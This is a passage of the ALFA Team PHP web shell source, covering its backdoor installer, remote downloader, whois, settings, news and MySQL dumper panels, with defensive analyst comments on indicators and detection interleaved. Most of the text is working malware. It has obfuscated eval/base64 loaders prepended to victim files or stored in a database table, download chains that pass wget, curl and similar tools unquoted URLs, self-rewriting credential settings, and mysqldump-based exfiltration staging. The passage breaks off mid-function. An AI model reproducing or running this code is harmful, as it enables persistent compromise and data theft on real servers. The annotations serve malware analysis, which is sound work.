        // Analyst note: the images are hot-linked over plain HTTP, so rendering the panel makes
        // the operator's browser request that host. Requests for these paths (often with the
        // compromised site as Referer) are a network indicator worth searching proxy logs for.
  2001.     $s['btn']='http://solevisible.com/images/btn.png';
  2002.     $s['alfamini']='http://solevisible.com/images/alfamini.png';
  2003.     $s['loader']='http://solevisible.com/images/loader.png';
        // Disabled alternative: embed the image inline as a data: URI instead of hot-linking.
  2004.     //return 'data:image/png;base64,'.__get_resource($s[$r]);
  2005.     return $s[$r];
  2006. }
  2007. function alfainbackdoor(){
        // Analyst note: persistence feature. It prepends a small PHP loader to an existing,
        // writable file chosen by the operator, in one of two variants:
        //   'file' - the encoded payload is embedded in the loader itself;
        //   'db'   - the payload is stored in a MySQL table and the loader fetches it.
        // Inputs arrive as POST fields alfa1..alfa9. The payload is either the operator's own
        // code or $GLOBALS['__ALFA_SHELL_CODE'] (defined outside this section).
        // Defensive relevance: removing the main shell file does not remove these loaders.
        // Incident response has to sweep every PHP file the web user can write and every
        // database the application can reach.
  2008. alfahead();
  2009. echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
  2010. $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
  2011. $success= '<font color="green">Success...!';
  2012. $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
  2013. $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
  2014. $cwd = 'Example: /home/alfa/public_html/index.php';
  2015. if($_POST['alfa1']=='file'){
  2016. echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
  2017. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
  2018. $method = $_POST['alfa2'];
  2019. $file = $_POST['alfa3'];
  2020. $shell = $_POST['alfa4'];
        // The key has only quote characters removed; it defaults to the literal 'alfa'.
  2021. $key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
  2022. if($key=='')$key='alfa';
        // __ZW5jb2Rlcg is defined outside this section. Presumably it base64-encodes, since
        // the loader below base64-decodes what it receives (confirm against its definition).
  2023. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
        // Detection: the loader is gated on the GET parameter "alfa" matching the key, and it
        // spells create_function / eval / base64_decode as concatenated fragments, so a plain
        // grep for those names misses it. Match the `$_GET["alfa"]` gate or the fragmented
        // strings themselves, and review access logs for requests carrying ?alfa=.
  2024. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
        // The loader is prepended, so the infected file gains a new first line and a new
        // mtime/hash. File-integrity monitoring on the web root catches this write.
  2025. if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
  2026. if($_POST['alfa1']=='db'){
  2027. echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
  2028. $table = array('td1' =>
  2029. array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  2030. 'td2' =>
  2031. array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2032. 'td3' =>
  2033. array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  2034. 'td4' =>
  2035. array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  2036. 'td5' =>
  2037. array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
  2038. 'td6' =>
  2039. array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
  2040. );
  2041. create_table($table);
  2042. echo("<p>{$select}</p>");
  2043. echo($textarea);
  2044. echo("<p><input type='submit' value=' '></p></form></p></center>");
  2045. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
  2046. $dbhost = $_POST['alfa2'];
  2047. $dbuser = $_POST['alfa3'];
  2048. $dbpw = $_POST['alfa4'];
  2049. $dbname = $_POST['alfa5'];
  2050. $file = $_POST['alfa6'];
  2051. $method = $_POST['alfa7'];
  2052. $shell = $_POST['alfa8'];
  2053. $key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
  2054. if($key=='')$key='alfa';
  2055. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
  2056. if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
        // DB variant: the loader written to disk carries the database host, user, password and
        // name in clear text, and reads its payload from column `code` of table `alfa_bc`.
        // Treat any database credentials found in such a loader as compromised and rotate them.
  2057. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
  2058. if(@is_file($file)&&@is_writable($file)){
        // Host artefact: a table named `alfa_bc` with a single LONGTEXT column `code`.
        // Its presence in any schema is an indicator, and it survives file-level cleanup.
  2059. @mysqli_query($conn,'DROP TABLE `alfa_bc`');
  2060. @mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
  2061. @mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
  2062. @file_put_contents($file,$code."\n".@file_get_contents($file));
  2063. __alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
  2064. echo('</div>');
  2065. alfafooter();
  2066. }
  2067. function alfawhois(){
        // Analyst note: WHOIS lookup for a domain supplied in POST alfa1 (alfa2 must be '>>').
        // Lookup order: api.whoapi.com via file_get_contents, the same URL via the AlfaCURL
        // helper, then a local `whois` command through alfaEx (defined outside this section;
        // presumably the shell's command runner).
  2068. echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
  2069. if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
        // Only scheme prefixes and "www." are removed; the remainder is used unmodified in
        // both the URL and the command line below.
  2070. $site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
        // Network indicator: the web server itself calls api.whoapi.com over plain HTTP with a
        // hard-coded API key. Outbound requests to that host from a server with no business
        // reason to make them merit investigation.
  2071. $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
  2072. $data = @file_get_contents($target);
  2073. if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
  2074. $target = @json_decode($data,true);
  2075. echo __pre();
        // Host indicator: a `whois` process whose parent is the web server / PHP worker.
  2076. if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
  2077. echo("</div>");
  2078. }
  2079. function alfaremotedl(){
        // Analyst note: "Upload From Url" panel. The server fetches a remote file and stores it
        // locally (tool ingress). Inputs: alfa1 = URL, alfa2 = destination path prefix,
        // alfa3 = '>>' to trigger. The transfer itself is done by __download().
        // Defensive relevance: egress filtering on the web tier and a web root that the PHP
        // user cannot write to both defeat this feature.
  2080. alfahead();
  2081. echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
  2082. <form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
  2083. <p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>
  2084. <div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
  2085. </form></p></center>");
  2086. if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
  2087. echo __pre();
  2088. $url = $_POST['alfa1'];
  2089. $path = $_POST['alfa2'];
  2090. echo('<center>');
        // Only success or failure is reported; the stored file name comes from the URL.
  2091. if(__download($url,$path)){
  2092. echo('<font color="green">Success...!</font>');
  2093. }else{
  2094. echo('<font color="red">Error...!</font>');
  2095. }
  2096. echo('</center>');
  2097. }
  2098. echo("</div>");
  2099. alfafooter();
  2100. }
  2101. function __download($url,$path=false){
        // Fetches $url and stores it as $path . basename(url); returns true or false.
        // Analyst note: it first tries a PHP stream read (__read_file) plus __write_file
        // (defined outside this section), then falls back to a chain of external downloaders
        // run through alfaEx (presumably the shell's command runner).
        // Detection: the web server / PHP worker spawning wget, curl, lwp-download, lynx, GET,
        // links or fetch is a strong process-lineage signal, as is a new file appearing in a
        // web-served directory immediately afterwards.
        // Accepts any lower-case "scheme://" prefix, not just http/https.
  2102. if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
  2103. $saveas = basename(rawurldecode($url));
        // $path is prepended without adding a separator.
  2104. if($path){$saveas=$path.$saveas;}
  2105. if($content = __read_file($url)){
  2106. if(@is_file($saveas))@unlink($saveas);
  2107. if(__write_file($saveas, $content)){return true;}}
        // In every fallback the URL and destination are concatenated into the command line
        // without quoting. Success is judged only by whether the destination file exists.
  2108. $buff = alfaEx("wget ".$url." -O ".$saveas);
  2109. if(@is_file($saveas)) return true;
  2110. $buff = alfaEx("curl ".$url." -o ".$saveas);
  2111. if(@is_file($saveas)) return true;
  2112. $buff = alfaEx("lwp-download ".$url." ".$saveas);
  2113. if(@is_file($saveas)) return true;
  2114. $buff = alfaEx("lynx -source ".$url." > ".$saveas);
  2115. if(@is_file($saveas)) return true;
  2116. $buff = alfaEx("GET ".$url." > ".$saveas);
  2117. if(@is_file($saveas)) return true;
  2118. $buff = alfaEx("links -source ".$url." > ".$saveas);
  2119. if(@is_file($saveas)) return true;
  2120. $buff = alfaEx("fetch -o ".$saveas." -p ".$url);
  2121. if(@is_file($saveas)) return true;
  2122. return false;
  2123. }
  2124. function clean_string($string){
        // When iconv is available: trims surrounding whitespace, then re-encodes UTF-8 to UTF-8
        // with //IGNORE, which drops byte sequences that are not valid UTF-8.
        // Forensic note: content passed through this helper is not byte-faithful, so a file
        // saved after this filtering may not hash-match the remote original.
  2125.   if(function_exists("iconv")){
  2126.       $s = trim($string);
  2127.       $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
  2128.   }
        // $s is assigned only inside the iconv branch above.
  2129.   return $s;
  2130. }
  2131. function __read_file($file, $boom = true){
        // Reads $file (a local path or, as used by __download, a URL) in 8192-byte chunks via
        // fopen/fread. With $boom true each chunk is passed through clean_string().
        // If nothing was read, it falls back to `cat` through alfaEx (defined outside this
        // section; presumably the shell's command runner).
        // Detection: `cat` spawned by the web server / PHP worker is a process-lineage
        // indicator, typically seen when PHP file access is restricted but command execution
        // is not.
  2132. $content = false;
  2133. if($fh = @fopen($file, "rb")){
  2134. $content = "";
  2135. while(!feof($fh)){
  2136. $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
  2137. }
  2138. }
        // The handle is never closed explicitly. The fallback also runs for a zero-length file.
  2139. if(empty($content)||!$content){
        // addslashes() is not a shell-quoting function; the path is placed inside single quotes.
  2140.     $content = alfaEx("cat '".addslashes($file)."'");
  2141. }
  2142. return $content;
  2143. }
  2144. function alfaSettings(){
        // Analyst note: settings panel that works by rewriting the shell's own source file.
        // Two sub-pages are selected by POST alfa8:
        //   'main'  - user name, password, login-page style, "protect", icons, POST encryption;
        //   'color' - UI colour map (edit / export / import).
        // Defensive relevance: every saved change alters the file on disk, so a single file
        // hash is an unreliable indicator for this family. Signatures should key on structure
        // (the config array keys, the obfuscated loader) rather than on a fixed digest.
  2145. alfahead();
  2146. AlfaNum(6,7,8,9,10);
  2147. echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
  2148. if($_POST["alfa8"] == "main"){
  2149. echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
  2150. $lg_array = array('0'=>'No','1'=>'Yes');
  2151. $penc_array = array('false'=>'No','true'=>'Yes');
  2152. $protect_html = "";
  2153. $icon_html = "";
  2154. $postEnc_html = "";
  2155. $login_html = "";
  2156. foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
  2157. foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
  2158. foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
        // Login-page choices are a GUI form or pages labelled 500 / 403 / 404. Presumably the
        // login prompt is then rendered to look like that HTTP error (the rendering code is not
        // in this section). For triage: an error-looking response body from a suspicious PHP
        // file does not show that the file is inert.
  2159. $lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
  2160. foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
  2161. echo '';
  2162. echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
  2163. if($_POST['alfa5']=='>>'){
  2164. echo __pre();
  2165. if(!empty($_POST['alfa3'])){
  2166. $protect = $_POST['alfa1'];
  2167. $lgpage = $_POST['alfa2'];
  2168. $username = $_POST['alfa3'];
        // The panel password is kept as an unsalted MD5 hex digest. A 32-hex-character 'pass'
        // value in a recovered sample is therefore the operator credential hash.
  2169. $password = md5($_POST['alfa4']);
  2170. $icon = $_POST['alfa6'];
  2171. $post_encrypt = $_POST['alfa7'];
        // Self-modification: load this script's own file from home_cwd, regex-locate each
        // config entry, splice in the posted values and write the file back.
  2172. @chdir($GLOBALS['home_cwd']);
  2173. $basename = @basename($_SERVER['PHP_SELF']);
  2174. $data = @file_get_contents($basename);
  2175. $find_user = '/\'user\'(.*?),/i';
  2176. $find_pw = '/\'pass\'(.*?),/i';
  2177. $find_lg = '/\'login_page\'(.*?),/i';
  2178. $find_p = '/\'safemode\'(.*?),/i';
  2179. $icons = '/\'show_icons\'(.*?),/i';
  2180. $postEnc = '/\'post_encryption\'(.*?),/i';
  2181. if(!empty($username)&&preg_match($find_user,$data,$e)){
  2182. $new = '\'user\' => \''.$username.'\',';
  2183. $data = str_replace($e[0],$new,$data);
  2184. }
  2185. if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
  2186. $new = '\'pass\' => \''.$password.'\',';
  2187. $data = str_replace($e[0],$new,$data);
  2188. }
  2189. if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
  2190. $new = '\'login_page\' => \''.$lgpage.'\',';
  2191. $data = str_replace($e[0],$new,$data);
  2192. }
  2193. if(!empty($find_p)&&preg_match($find_p,$data,$e)){
  2194. $new = '\'safemode\' => \''.$protect.'\',';
  2195. $data = str_replace($e[0],$new,$data);
  2196. }
  2197. if(preg_match($icons,$data,$e)){
  2198. $new = '\'show_icons\' => \''.$icon.'\',';
  2199. $data = str_replace($e[0],$new,$data);
  2200. }
  2201. if(preg_match($postEnc,$data,$e)){
  2202. $new = '\'post_encryption\' => '.$post_encrypt.',';
  2203. $data = str_replace($e[0],$new,$data);
  2204. }
        // Detection: a PHP file under the web root overwritten by the web server's own user.
        // File-integrity monitoring or inotify/auditd rules on the docroot will record it.
  2205. if(@file_put_contents($basename,$data)){
  2206. echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
  2207. }else{
  2208. __alert("<span style='color:red;'>File has no edit access...!</span>");
  2209. }
  2210. }else{
  2211. __alert("<span style='color:red;'>UserName is Empty !</span>");
  2212. }
  2213. }
  2214. }elseif($_POST["alfa8"] == "color"){
  2215. echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
  2216. echo '<table border="1"><tbody>';
  2217. $template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
  2218. $x = 1;
  2219. foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
  2220.     $multi = "";
  2221.     if(is_array($value)){
  2222.         if(isset($value["multi_selector"])){
  2223.             $multi = __ZW5jb2Rlcg(json_encode($value));
  2224.         }
  2225.     }
  2226.     $value = alfa_getColor($key);
  2227.     $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
  2228.     echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
  2229. }
  2230. echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
  2231.  
  2232. echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
  2233. if($_POST['alfa7']=='export'){
  2234.     echo __pre();
  2235.     $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
  2236.     $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  2237.     $array = array();
  2238.     foreach($glob_colors as $k => $v){
  2239.         if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
  2240.             $v = trim($colors[$k]);
  2241.         }else{
  2242.             $v = trim(is_array($v)?$v["key_color"]:$v);
  2243.         }
  2244.         $array[$k] = $v;
  2245.     }
        // Host artefact: export drops a JSON file named alfa_color_config_<timestamp>.conf via
        // a relative path (so into the current working directory). Leftover files matching
        // that name are a useful sweep pattern.
  2246.     $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
  2247.     $config = json_encode($array, JSON_PRETTY_PRINT);
  2248.     if(!@file_put_contents($file, $config)){
  2249.         echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
  2250.     }else{
  2251.         echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
  2252.     }
  2253. }
  2254. if($_POST['alfa2']=='>>'){
  2255.     echo __pre();
  2256.     $colors = json_decode($_POST["alfa1"],true);
  2257.     $array = "";
  2258.     $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
  2259.     $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  2260.     foreach($glob_colors as $k => $v){
  2261.         if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
  2262.             $v = trim($colors[$k]);
  2263.         }else{
  2264.             $v = trim(is_array($v)?$v["key_color"]:$v);
  2265.         }
  2266.         $array .= '"'.trim($k).'" => "'.$v.'",';
  2267.     }
        // Same self-rewrite mechanism as the 'main' page: the 'color' => array(...) entry in the
        // script's own source is replaced and the file is written back.
  2268.     @chdir($GLOBALS['home_cwd']);
  2269.     $basename = @basename($_SERVER['PHP_SELF']);
  2270.     $data = @file_get_contents($basename);
  2271.     $color = '/\'color\'(.*?)\),/s';
  2272.     if(preg_match($color,$data,$e)){
  2273.         $new = "'color' => array(".$array."),";
  2274.         $data = str_replace($e[0],$new,$data);
  2275.         if(@file_put_contents($basename, $data)){
  2276.             echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
  2277.         }else{
  2278.             echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
  2279.         }
  2280.     }else{
  2281.         echo("<center><p><h3>[-] Error...!</h3></p></center>");
  2282.     }
  2283. }
  2284. }
  2285. echo('</div>');
  2286. alfafooter();
  2287. }
  2288. function alfaplus(){
        // Analyst note: "Alfa +" panel with three tabs chosen by POST alfa1: 'news' and 'tools'
        // pull an XML feed from solevisible.com; 'about' prints author contact details.
        // Network indicator: server-side HTTP requests from the compromised host to
        // solevisible.com/news.php or /tools.php (made through the AlfaCURL helper).
  2289. alfahead();
  2290. echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
  2291. if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
  2292. try{
  2293. $s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
  2294. $msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
  2295. $news = new AlfaCURL();
        // The feed is requested twice: once as the truthiness test, once for the body.
  2296. if($news->Send($s1)){
  2297. $xml = $news->Send($s1);
  2298. }else{
  2299. $xml = false;
  2300. }
  2301. if($xml){
  2302. if(@simplexml_load_string($xml)){
  2303. $doc = new DOMDocument;
  2304. $doc->loadXML($xml);
  2305. $data = $doc->getElementsByTagName('data')->item(0);
  2306. $items = $data->getElementsByTagName('item');
  2307. foreach($items as $item){
  2308. $title = $item->getElementsByTagName('title')->item(0)->nodeValue;
  2309. $description = $item->getElementsByTagName('description')->item(0)->nodeValue;
  2310. $link = $item->getElementsByTagName('link')->item(0)->nodeValue;
  2311. $pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
        // Feed fields are written into the page without HTML escaping; the feed is fetched
        // over plain HTTP.
  2312. echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font  color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
  2313. }
  2314. }else{
  2315. echo($msg);
  2316. }
  2317. }else{
  2318. echo($msg);
  2319. }
  2320. }catch(Exception $e){
  2321. echo $e->getMessage();
  2322. }}elseif($_POST['alfa1']=='about'){
        // Static attribution text. The handles and addresses below are useful as string
        // signatures when hunting for copies of this family on disk.
  2323. echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
  2324. <b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>
  2325. <font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
  2326. <font color='#00A220'>Contact : solevisible@gmail.com</font><br>
  2327. <font color='#00A220'>Telegram Channel: @solevisible</font><br>
  2328. <font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
  2329. <font color='#FFFFFF'>Skype : sole.sad</font><br>
  2330. <font color='#FF0000'>Persian Gulf For Ever</font><br>
  2331. <font color='#FF0000'>Iranian Hackers :)</font><br>
  2332. <font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>
  2333. </center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
  2334. }
  2335. echo('</div>');
  2336. alfafooter();
  2337. }
  2338. function alfaDumper(){
        // Analyst note: database exfiltration staging. Takes MySQL credentials and a target path
        // from POST alfa3..alfa7, checks them with mysqli_connect, then runs mysqldump through
        // alfaEx (defined outside this section; presumably the shell's command runner) and
        // redirects the dump to the chosen file. The default is <cwd>alfa.sql.
        // Detection: mysqldump spawned by the web server / PHP worker, and a large .sql file
        // (default name alfa.sql) appearing in a web-served directory. If that file was
        // reachable over HTTP, check access logs for its retrieval to scope data exposure.
  2339. alfahead();
  2340. echo('<div class="header">');
  2341. AlfaNum(8,9,10);
  2342. echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
  2343. $table = array('td1' =>
  2344.  array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  2345.  'td2' =>
  2346.  array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2347.  'td3' =>
  2348.  array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  2349.  'td4' =>
  2350.  array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  2351.  'td5' =>
  2352.  array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
  2353. );
  2354. create_table($table);
  2355. echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
  2356. $username = ($_POST['alfa3']);
  2357. $password = ($_POST['alfa4']);
  2358. $dbname = ($_POST['alfa5']);
  2359. $dfile = ($_POST['alfa6']);
  2360. $host = ($_POST['alfa7']);
  2361. if(!empty($dbname)){
  2362. echo __pre();
  2363. $msg = "<center>Check this :  <font color='red'>".$dfile."</font></center>";
  2364. if(@mysqli_connect($host,$username,$password,$dbname)){
  2365. if(strlen(alfaEx("mysqldump"))>0){
        // The DB password is passed on the mysqldump command line, so it appears in process
        // listings and in any command-line audit log (e.g. auditd execve records). That helps
        // identify which credentials were used and need rotating.
  2366. alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
  2367. echo($msg);
  2368. }else{
  2369. __alert("Error...!");
